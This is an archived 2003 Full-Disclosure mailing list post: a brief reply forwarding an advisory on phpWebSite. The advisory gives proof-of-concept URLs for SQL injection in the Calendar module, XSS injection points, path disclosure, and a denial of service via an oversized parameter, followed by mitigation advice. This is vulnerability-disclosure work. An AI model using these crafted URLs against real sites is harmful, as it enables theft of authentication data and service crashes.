[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200308112021.h7BKLTs3018948@novappc.com>
From: novappc at novappc.com (Lorenzo Hernandez Garcia-Hierro)
Subject: phpWebSite SQL Injection & DoS & XSS Vulnerabilities
Hi Jack,
i was contacted by the phpWebSite team for release the fix.
The fix is only for prevent the XSS attacks , theu are working now in
fixes for the SQL Injections.
best regards,
> There is a fix for this available at phpWebSite's page (posted a
short time
> ago):
> http://phpwebsite.appstate.edu/
>
> -Jack Whitsitt
>
>
> ----- Original Message -----
> From: "Lorenzo Hernandez Garcia-Hierro" <novappc@...appc.com>
> To: <full-disclosure@...ts.netsys.com>
> Sent: Sunday, August 10, 2003 6:15 PM
> Subject: [Full-Disclosure] phpWebSite SQL Injection & DoS & XSS
> Vulnerabilities
>
>
> >
> > phpWebSite SQL Injection & DoS & XSS Vulnerabilities
> > ------
> > PRODUCT: phpWebSite
> > VENDOR: Appalachian State University
> > VULNERABLE VERSIONS:
> >
> > - 0.9.x
> > - 0.8.x
> > - 0.7.x
> > - And older versions.
> >
> > NO VULNERABLE VERSIONS
> >
> > - ?
> > ---------------------
> >
> > Description:
> >
> > phpWebSite provides a complete web site content management system.
Web-
> > based administration allows for easy maintenance of interactive,
> > community-driven web sites.
> >
> > ---------------------------------------------
> > |SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
> > ---------------------------------------------
> >
> > I encountered SQL Injection vulnerabilities in some of the
phpWebSite
> > modules , XSS ( Cross Site Scripting ) , Path Disclosures and a
Denial
> > of Service attack.
> >
> > -------------
> > | SQL |
> > | INJECTION |
> > -------------
> >
> > I encountered SQL Injection vulnerabilities in the Calendar module ,
> > active in default configurations , that allows you
> > to execute SQL queries in the target server with the privileges of
the
> > application user.
> >
> > When you send a special-crafted command url to the Calendar script
you
> > get a SQL error flag like this:
> > __________________________________________________________________
> > DB Error: syntax error
> > select * from mod_calendar_events where ((startDate >= 2003\0
[CRAFTED
> > VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
> > (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED
> > VALUE]0110)) and active=1 [nativecode=1064
> > ** You have an error in your SQL syntax near
> > '\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110)
or
> > (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]
> > ___________________________________________________________________
> >
> > This is an example error flag:
> > ___________________________________________________________________
> > DB Error: syntax error
> > select * from mod_calendar_events where ((startDate >= 2003\0-10110
and
> > startDate <= 2003\0-10110) or
> > (endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1
> > [nativecode=1064
> > ** You have an error in your SQL syntax near
> > '\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110
> > and endDate ' at line 1]
> > ___________________________________________________________________
> >
> > For get this you must use this simple url:
> >
> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> > =day&year=2003%00-1&month=
> >
> > And you get the SQL Error flag. The error occurs when the query
> > includes the crafted value 2003[%00 = null]-1 .
> > You can design a successful query for get configuration values or
> > authentication data.
> > I desgined an url that makes a successful query ( no hostile
query ) :
> >
> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> > =month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%
20or%
> > 20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%
29%
> > 29%20and%20active%3d1
> >
> > it is ( without url encoding ) :
> >
> > 2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <=
> > 20071205)) and active=1
> >
> > It is needed to have a little knowledge of SQL ( in this case ,
MySQL )
> > for make a successful attack.
> >
> > Other scripts of the Calendar module are affected by this hole ,
when
> > you send a crafted request like a + symbol at critical url variable
> > value
> > you get the "pure" sql server error flag and you can imagine ( i
like
> > this word ) a sql query for view private information of the
application
> > by
> > looking at the error pages , like an try-error method.
> >
> > Another urls for probe are:
> >
> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> > =day&month=0&year=<
> >
> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> > =day&month=1%00&year=)SQL_INJECTION_FAKU
> >
> > ------------------
> > | XSS |
> > | vulnerabilities|
> > ------------------
> >
> > I encountered XSS security holes in some scripts of phpWebSite :
> >
> >
> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> > =day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
> >
> > http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]
> > =viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
> >
> > http://[HOST]/[PATH]/index.php?
> > module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK
CODE]
> > &MMN_position=[X:X]
> >
> > http://[HOST]/[PATH]/index.php?
> > module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
> >
> >
> > Note that the Calendar & PageMaster & Fatcat modules are affected
> > COMPLETLY and all the script variables that are passed by url are
> > affected too by this.
> >
> > When you access a hostile link with a xss attack in those scripts
youur
> > browser will execute the script commands.
> > This can be use for steal cookies , authentication tokens and other
> > private information.
> > If your browser is vulnerable to other holes ( like MSIE ;-) you can
> > have more problems...
> >
> > XSS AT SQL ERRORS:
> >
> > If you send a crafted url command with a XSS attack code to some of
the
> > scripts that are vulnerable against sql injection vulnerabilities ,
the
> > xss attack code will be executed
> > in the error page.
> >
> >
> > -----------------
> > | PATH |
> > | DISCLOSURES |
> > -----------------
> >
> > I tested this in a Win2K ( Windows 2000 Professional ) with SP3 and
> > versions:
> >
> > - Sambar Server 5.2 beta
> > - PHP 4.2.3 running as ISPAI module
> > - MySQL NT [normal service] 3.23.56
> > - Include_Path to the pear folder of phpwebsite
> >
> > Sending this:
> >
> > http://127.0.0.1/index.php?module=calendar&calendar[view]
> > =month&month=11&year=9 # You can try other things and get the same #
> >
> > you get this:
> >
> > Warning: localtime(): invalid local time in
> > C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
> >
> > Warning: localtime(): invalid local time in
> > C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
> >
> > <- more than fifty repetitions of this warning ->
> >
> > It is a strange error , i think that it only occurs in MSWindows
> > installations.
> > Possible it occurs when the Pear library TimeZone.php script tries
to
> > convert the localdate in unix time stamp format.
> >
> > ------------------
> > | DENIAL OF |
> > | SERVICE |
> > ------------------
> >
> > There is a DoS/Buffer Overflow Attack in a script inside the
Calendar
> > module that allows you to crash the host running
> > the MySQL server and the phpWebSite scripts ( must be the same
> > computer ).
> >
> > This is a basic proof of concept for this vulnerability :
> >
> > http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar
[view]=
> > [VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )
> >
> > An attack like this causes a system global crash including the
server
> > service and the mysql service.
> >
> > -----------------
> > | SoLuTiOnS |
> > -----------------
> >
> > 1.- Be sure that the user of the phpWebSite database has only
SELECT ,
> > INSERT and UPDATE privileges in only the phpWebSite
> > database.
> >
> > 2.- Use the php function eregi_replace for prevent XSS attacks.
> >
> > 3.- Turn php_error_flags to Off .
> >
> > 4.- Use in addition an external module if you are using apache like
> > mod_security .
> >
> > 5.- If you are paranoic don't use PHP , MySQL , Windows , Linux ,
> > computers , tcp/ip , netbios , games , asp ,
> > Apache...... nothing !
> > WARNING ;-) : ( paranoic solution... )
> >
> > -----------
> > | CONTACT |
> > -----------
> >
> > Lorenzo Hernandez Garcia-Hierro
> > --- Computer Security Analyzer ---
> > --Nova Projects Professional Coding--
> > PGP: Keyfingerprint
> > B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
> > ID: 0x9C38E1D7
> > **********************************
> > www.novappc.com
> > security.novappc.com
> > www.lorenzohgh.com
> > ______________________
> >
> > NSRG-20-7
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
>
Powered by blists - more mailing lists